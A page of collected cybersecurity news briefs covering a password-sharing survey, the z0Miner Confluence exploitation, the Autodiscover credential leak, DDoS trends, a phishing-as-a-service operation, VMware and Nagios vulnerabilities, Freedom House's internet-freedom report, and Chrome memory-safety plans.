Information Technology

If you ever get concerned about how easy your password is and worry whether someone could guess it, you need to tighten up your security processes. Whether through password sharing or sloppy password habits, many people still leave their personal and professional accounts vulnerable, and it is a huge risk for companies and home users alike.

ZDNet Recommends

The best password manager

Everyone needs a password manager. It’s the only way to maintain unique, hard-to-guess credentials for every secure site you and your team access daily.

Read More

New York, NY-based digital identity firm Beyond Identity spoke with 1,015 people in the US to learn more about their password-making strategies and how they generally conduct themselves in regards to online safety.Many of us already share our account passwords. Over half of us (50.1%) share our video streaming account, and almost as many share our music streaming accounts (44.9%). One in four of us (25.7%) share passwords to our online banking. On average, we share three of our passwords with other people. The study revealed that many people try to guess others’ passwords and are often successful. Over 73% managed to guess someone’s passwords. Over half (51.6%) try to guess their romantic partner’s passwords, and almost one in four (24.6%) try to guess their child’s password.

Over one in five (22%) try to guess their co-worker’s password, and one in five (19.9%) try to guess their ex-partner’s or boss’ password. The most common tactic is using information known about the other person (39.2%), while 18.4% check the person’s social media profiles to try and guess. Over two in five (43.7%) try to guess passwords for personal email accounts, and almost one in three (32.6%) try to guess phone passwords.
Beyond Identity
People were most interested in gaining access to the accounts of their romantic partners. Those trying to guess their boss’ password were trying to get into their employer’s work email, while phones were the most common target for those guessing the password of a romantic partner. Almost two in five (37.6%) of people never use a password generator. The average password tends to be 15 characters long, with over one in four (27.4%) choosing their pets names for a password. Over one in three (27%) use random letters, and three in ten (30.7%) use random characters to replace letters. The survey showed that Generation X were most likely to use a password generator whilst half of the baby boomers had never used a password generator.
With easy-to-guess passwords, it is not really surprising that 18% of people have had their online banking accounts compromised or hacked. Having a strong password policy in place with difficult-to-guess passwords drives many to write their complicated password down on paper — ruining its effectiveness. Two-factor authentication and authenticator apps can go some way to helping users secure their online environments, but add online security and social engineering to trick you out of your password, and you can see how easy it is for your online accounts to be compromised. Trying to stay vigilant to scams and protecting your passwords — even with a password vault, can become a layer of complexity too hard to manage — and if that happens, someone successfully guessing your password could be as easy as a walk in the park. More

The z0Miner cryptojacker is now weaponizing a new Confluence vulnerability to mine for cryptocurrency on vulnerable machines. 

Trend Micro researchers said on Tuesday that the cryptocurrency mining malware is now exploiting a recently-disclosed Atlassian Confluence remote code execution (RCE) vulnerability, which was only made public in August this year.  Tracked as CVE-2021-26084, the vulnerability impacts Confluence server versions 6.6.0, 6.13.0, 7.4.0, and 7.12.0.  Issued a CVSS severity score of 9.8, the critical security flaw is an Object-Graph Navigation Language (ONGL) injection vulnerability that can be exploited to trigger RCE — and is known to be actively exploited in the wild.  The vulnerability was reported by Benny Jacob through Atlassian’s bug bounty program. z0Miner, a Trojan and cryptocurrency mining bundle, has been updated to exploit the RCE, as well as Oracle’s WebLogic Server RCE (CVE-2020-14882) an ElasticSearch RCE (CVE-2015-1427), Jenkins, and other code execution bugs in popular server software.   Once a vulnerable server has been found and the vulnerability has been used to obtain remote access, the malware will deploy a set of webshells to install and execute malicious files, including a .dll file disguised as a Hyper-V integration service, as well as a scheduled task that pretends to be a legitimate .NET Framework NGEN task. 

The task will attempt to download and execute malicious scripts from a repository on Pastebin, but as of now, the URL has been pulled.  These initial actions are aimed at maintaining persistence on an infected machine. In its second-stage payload deployment, z0Miner will then scan and destroy any competing cryptocurrency miners installed on the server, before launching its own — a miner that steals computing resources to generate Monero (XMR). A patch has been released to resolve CVE-2021-26084, and as threat actors will always seek to exploit new bugs for their own ends — the Microsoft Exchange Server attacks being a prime example — vulnerable systems should always be updated with new security fixes as quickly as possible by IT administrators. Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

A “design flaw” in the Microsoft Autodiscover protocol was subject to an investigation by researchers who found they were able to harvest domain credentials. 

On Wednesday, Guardicore Labs’ AVP of Security Research Amit Serper published the results of an analysis of Autodiscover, a protocol used to authenticate to Microsoft Exchange servers and to configure client access.  There are different iterations of the protocol available for use. Guardicore explored an implementation of Autodiscover based on POX XML and found a “design flaw” that can be exploited to ‘leak’ web requests to Autodiscover domains outside of a user’s domain, as long as they were in the same top-level domain (TLD).  To test out the protocol, the team first registered and purchased a number of domains with a TLD suffix, including Autodiscover.com.br, Autodiscover.com.cn, Autodiscover.com.fr, and Autodiscover.com.uk, and so on.  These domains were then assigned to a Guardicore web server, and the researchers say they “were simply waiting for web requests for various Autodiscover endpoints to arrive.” The “back-off” procedure is described as the “culprit” of the leak as failures to resolve URLs based on parsed, user-supplied email addresses will result in a “fail up”: “Meaning, the result of the next attempt to build an Autodiscover URL would be: http://Autodiscover.com/Autodiscover/Autodiscover.xml,” the researchers explained. “This means that whoever owns Autodiscover.com will receive all of the requests that cannot reach the original domain. […] To our surprise, we started seeing significant amounts of requests to Autodiscover endpoints from various domains, IP addresses, and clients.”

In total, Guardicore was able to capture 372,072 Windows domain credentials and 96,671 unique sets of credentials from sources including Microsoft Outlook and email clients between April 16 and August 25, 2021. Some sets were sent via HTTP basic authentication.
Guardicore
Chinese companies, food manufacturers, utility firms, shipping and logistics organizations, and more were included.  “The interesting issue with a large amount of the requests that we received was that there was no attempt on the client’s side to check if the resource is available or even exists on the server before sending an authenticated request,” the team explained.  Guardicore was also able to create an attack method based on an attacker controlling relevant TLD domains which downgraded credentials sent to them in alternative authentication systems — such as NTLM and OAuth — to HTTP basic authentication. Serper told ZDNet, “the protocol flaw isn’t new; we were just able to exploit it at a massive scale.” Past research conducted by Shape Security and published in 2017 explores Autodiscover and its potential for abuse (.PDF). However, the paper focuses on Autodiscover implementations in mobile email clients. Guardicore says it has “initiated responsible disclosure processes with some of the vendors affected” by the latest discovery.In order to mitigate this issue, Guardicore says that Autodiscover TLD domains should be blocked by firewalls, and when Exchange setups are being configured, support for basic authentication should be disabled — as this is “the same as sending a password in clear text over the wire.” Update 20.39 BST: “We are actively investigating and will take appropriate steps to protect customers,” Jeff Jones, Sr. Director at Microsoft said in a statement. “We are committed to coordinated vulnerability disclosure, an industry standard, collaborative approach that reduces unnecessary risk for customers before issues are made public. Unfortunately, this issue was not reported to us before the researcher marketing team presented it to the media, so we learned of the claims today.”  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

There’s been a rise in distributed denial of service (DDoS) attacks in recent months in what cybersecurity researchers say is a record-breaking number of incidents. According to a report by cybersecurity researchers at Netscout, there were 5.4 million recorded DDoS attacks during the first half of 2021 – a figure that represents an 11% rise compared with the same period last year. 

ZDNet Recommends

A DDoS attack is a crude but effective form of cyberattack that sees attackers flood the network or servers of the victim with a wave of internet traffic that’s so large that the infrastructure is overwhemed by the number of requests for access, slowing down services or taking them fully offline and preventing legitimate users from accessing the service at all.  Often, the machines being used to launch DDoS attacks – which can be anything that connects to the internet and so can range from servers and computers to Internet of Things products – are controlled by attackers as part of a botnet. The real owners of the devices are unlikely to know that their device has been hijacked in this way.  SEE: Cybersecurity: Let’s get tactical (ZDNet special feature) In some cases, DDoS attacks are simply designed to cause disruption with those behind the attacks just launching them because they can. However, in other instances there’s also an extortion element at play, with attackers threatening to launch a DDoS attack against a victim if they don’t give into a demand for payment. But it isn’t just the rise in DDoS attacks that makes them disruptive; cyber criminals are adapting new techniques to evolve their attacks in order to help them bypass cloud-based and on-premise defences. 

“The tooling behind these attacks has matured over the years,” Hardik Modi, Netscout area vice president of engineering, threat and mitigation products, told ZDNet.  For example, cyber criminals are increasingly leveraging multi-vector DDoS attacks that amplify attacks by using many different avenues to direct traffic towards the victim, meaning that if traffic from one angle is disrupted or shut down, the others will continue to flood the network of the target. In many cases, the attackers will specifically tailor these to exploit vulnerabilities of the target. 

Researchers note that multi-vector attacks are getting more diverse (a vector is essentially a method or technique that is used in the attack like DNS reflection or TCP SYN floods). In 2020, the largest one of these attacks used 26 vectors. During the first half of 2021, there have been a number of attacks using between 27 and 31 different vectors, plus an attacker can switch between them to make the attack harder to disrupt. SEE: Four months on from a sophisticated cyberattack, Alaska’s health department is still recoveringDDoS attacks have become more effective during the past year due to the added reliance on online services. Disruption to services that people are relying on in both their professional and personal lives has the potential to have a significant impact.  However, in the majority of cases it’s possible to defend against DDoS attacks by implementing the industry’s best current practices to maintain availability of services in the face of an incident. These practices include setting specific network access policies as well as regularly testing DDoS defences to confirm they can protect the network from attacks. MORE ON CYBERSECURITY More

Microsoft is shining a light on a phishing-as-a-service operation that’s selling fake login pages for cloud services like OneDrive that help non-technical cybercriminals steal business user passwords and usernames. Phishing kits are nothing new, but this phishing-as-a-service service caught the attention of Microsoft’s security teams because it lowers the bar to quality phishing even more. 

ZDNet Recommends

The best cyber insurance

The cyber insurance industry is likely to go mainstream and is a simple cost of doing business. Here are a few options to consider.

Read More

That business, called BulletProofLink and a few other names, provides email and web site templates as phishing kits do, but also offers email delivery, hosting services, credential theft. It also claims to provide ‘fully undetected’ (FUD) links and logs and is available for purchase as a weekly, bi-weekly, monthly, or annual subscription. SEE: Half of businesses can’t spot these signs of insider cybersecurity threatsAs Microsoft outlines, phishing service providers are one link in the chain that can help ransomware gangs unload file-encrypting ransomware pain on targets, chiefly by providing passwords to attackers who can try them out on compromised networks. If the ransomware buyer is lucky, the credentials can include passwords for high-value admin accounts, allowing for greater movement within a compromised network. “These [FUD] phishing service providers host the links and pages and attackers who pay for these services simply receive the stolen credentials later on. Unlike in certain ransomware operations, attackers do not gain access to devices directly and instead simply receive untested stolen credentials,” the Microsoft 365 Defender Threat Intelligence Team notes in a blogpost.   Microsoft is concerned about businesses like these because they offer dozens of templates for the login pages of popular web services and allow anyone on a small budget to beat a path to theft or extortion. It currently offers “login scam” pages for Microsoft OneDrive, LinkedIn, Adobe, Alibaba, American Express, AOL, AT&T, Dropbox, and Google Docs. 

It’s also worried about “double theft”, where the phishing service provider captures the credentials on behalf of one customer and then sells the credentials to other customers.BulletProofLink markets itself openly on the web and on underground forums, and is also known as BulletProftLink or Anthrax. It’s even published ‘how-to’ videos on YouTube and Vimeo to help customers use its fraud tools. Microsoft published its research into this operation to help customers refine email-filtering rules and adopt security technologies it offers. While phishing kits are sold once in a ZIP file with phishing templates to set up a bogus login page or emails, phishing-as-a-service includes the whole package. The company caught Microsoft’s attention while it was investigating a phishing campaign that was using BulletProofLink services. The campaign used a whopping 300,000 subdomains with a technique Microsoft calls “infinite subdomain abuse”, which is where an attacker has compromised a website’s domain name system server (DNS) or when a compromised site is configured with a DNS that allows wildcard subdomains.

These subdomains “allow attackers to use a unique URL for each recipient while only having to purchase or compromise one domain for weeks on end”, Microsoft says. They’re useful before the attacker can simply compromise the DNS of a site and not bother with hacking the site itself. It also allows phishing businesses to create a ton of unique URLs that are hard to detect. SEE: Four months on from a sophisticated cyberattack, Alaska’s health department is still recoveringRansomware service provider models are also influencing how phishing businesses operate. One notable ransomware technique is to steal data before encrypting it and then either sell that data or use it as leverage during extortion attempts. “We have observed this same workflow in the economy of stolen credentials in phishing-as-a-service,” Microsoft says. “With phishing kits, it is trivial for operators to include a secondary location for credentials to be sent to and hope that the purchaser of the phish kit does not alter the code to remove it. This is true for the BulletProofLink phishing kit, and in cases where the attackers using the service received credentials and logs at the end of a week instead of conducting campaigns themselves, the PhaaS operator maintained control of all credentials they resell.”    More

Image: Shutterstock
If you haven’t patched vCenter in recent months, please do so at your earliest convenience. Following on from its remote code execution hole in vCentre in May, VMware has warned of a critical vulnerability in the analytics service of vCenter Server. “A file upload vulnerability that can be used to execute commands and software on the vCenter Server Appliance. This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,” the company said in a blog post. Handed the label CVE-2021-22005, the vulnerability hit a CVSSv3 score of 9.8, and means a malicious actor only needs to access port 443 and have a file to upload that is capable to exploiting an unpatched server. The vulnerability hits versions 6.7 and 7.0 of vCenter Server Appliances, with builds greater than 7.0U2c build 18356314 from August 24 and 6.7U3o build 18485166 released on September 21 patched. The exploit does not impact vCenter 6.5 versions. For those looking for a workaround instead of applying a patch, VMware has issued instructions. The workaround will be reverted once the server instance is patched. VMware said users should patch immediately.

“The ramifications of this vulnerability are serious and it is a matter of time — likely minutes after the disclosure — before working exploits are publicly available,” it said. Other vulnerabilities addressed in VMware’s advisory included CVE-2021-21991, a CVSSv3 8.8 local privilege escalation involving session tokens that would see users gain administrator access; CVE-2021-22006, a CVSSv3 8.3 reverse proxy bypass that could allow access to restricted endpoints; and CVE-2021-22011 that could allow for unauthenticated VM network setting manipulation. All up, of the 19 vulnerabilities listed in its advisory, 10 were found by George Noseevich and Sergey Gerasimov of SolidLab. Elsewhere, Claroty Team 82 detailed how it chained together a number of vulnerabilities in Nagios XI to gain a reverse shell with root remote code execution. Although 11 vulnerabilities were found — four of which were handed a CVSSv3 score of 9.8 and included an SQL injection — only two were needed for the reverse shell: CVE-2021-37343, a path traversal vulnerability that allows for code to be executed as the Apache user; and CVE-2021-37347 that allows for local privilege escalation. The auto login feature of Nagios XI that allows for read-only access to the Nagios dashboard without credentials greatly expanded the attack surface, Team 82 said. “While this feature might be useful for NOC purposes, allowing users to easily connect to the platform and view information without the need for credentials also allows attackers to gain access to a user account in the platform, thus rendering any post-auth vulnerability exploitable without authentication,” they said. Patched versions of vulnerable Nagios XI products were released in August.One reverse root shell coming up
Image: Claroty
Related Coverage More

Image: Freedom House
Democracy advocate Freedom House has published findings that indicate a growing number of governments are forcing tech businesses to comply with online censorship and surveillance. The findings were released as part of the non-profit, non-governmental organisation’s (NGO) annual Freedom on the Net 2021 report [PDF], which found that 48 out of 70 countries covered in the report — which account for 88% of the world’s internet users — have pursued new rules for tech companies on content, data, or competition over the past year. “While some moves reflected legitimate attempts to mitigate online harms, rein in misuse of data, or end manipulative market practices, many new laws imposed excessively broad censorship and data-collection requirements on the private sector,” the report said. Of specific concern to the NGO was that at least 24 countries have passed or announced new laws or rules governing how platforms treat content, which it worries could lead to increased censorship of political dissent, investigative reporting, and expressions of ethnic, religious, sexual, or gender identity. According to Freedom House, this has culminated in global internet freedom declining again for the 11th consecutive year, with the greatest deteriorations being in Myanmar, Belarus, and Uganda. Freedom House’s measurement of internet freedom is done through assessing 21 different indicators pertaining to obstacles to access, limits on content, and violations of user rights, it explained.China, meanwhile, remained as the world’s worst abuser of internet freedom, the NGO claimed. This was due to the country introducing new legislation criminalising online expression that insults members of the armed forces, “heroes”, and “martyrs”, and its continued online censorship.

It also said China’s crackdown on tech has been “among the most aggressive” in addressing anti-competitive practices, raising concerns that the government is more interested in reining in the private sector’s autonomy and influence, rather than creating fairer markets. Other statistics unveiled in the report included 80% of countries that were analysed in the report arrested people for their online speech; 64% of those countries’ authorities deployed pro-government commentators to manipulate online discussions; 41% of countries disconnected internet or mobile networks for political reasons; and 46% of countries blocked or restricted social media platforms, which primarily occurred during protests and elections. On the surveillance front, authorities in at least 45 of the 70 countries covered by the report are suspected of having access to sophisticated spyware or data-extraction technology supplied by companies like NSO Group, Cellebrite, Circles, and FinFisher, Freedom House said. In providing this warning, the organisation has called for policymakers responsible for drafting data privacy laws to focus on protecting users while preventing greater fragmentation of the internet, such as by ensuring government surveillance programs adhere to the International Principles on the Application of Human Rights to Communications Surveillance. It also said policymakers should view encryption as being fundamental to cybersecurity, commerce, and human rights, and that weakening encryption would endanger the lives of activists, journalists, and members of marginalised communities. For other areas of legislation, Freedom House said competition policy should foster innovation that responds to user demand for greater personalisation, security, and interoperability and regulation should ensure that power does not accumulate in the hands of a few dominant actors, whether in government or the private sector.Related Coverage More

Image: Shutterstock
The Chrome security team has said it is willing to make the browser slightly slower if it means the tradeoff is a much more secure browser. Pointing to previous figures that 70% of all security problems are related to memory safety, the team said in a blog post that it was looking at three approaches: Compile-time checks, runtime checks, and using a memory safe language. Thanks to the use of C++, the first option was not possible, but it was looking at solutions such as MiraclePtr for runtime checking. “MiraclePtr prevents use-after-free bugs by quarantining memory that may still be referenced. On many mobile devices, memory is very precious and it’s hard to spare some for a quarantine,” the team said. “Nevertheless, MiraclePtr stands a chance of eliminating over 50% of the use-after-free bugs in the browser process — an enormous win for Chrome security, right now.” At the same time, the browser is continuing to look at how to integrate the Rust language to allow for compile-time checks which subsequently do not impact performance. “There are open questions about whether we can make C++ and Rust work well enough together,” the team said.

“Even if we started writing new large components in Rust tomorrow, we’d be unlikely to eliminate a significant proportion of security vulnerabilities for many years. And can we make the language boundary clean enough that we can write parts of existing components in Rust? We don’t know yet. ” The team said it is trying out some limited usage of Rust, but this has yet to make it through to production builds of Chrome. Invented by Mozilla, Rust has been used in parts of Firefox since 2016, and Google’s Android team has pushed to introduce Rust into the Linux kernel.Related Coverage More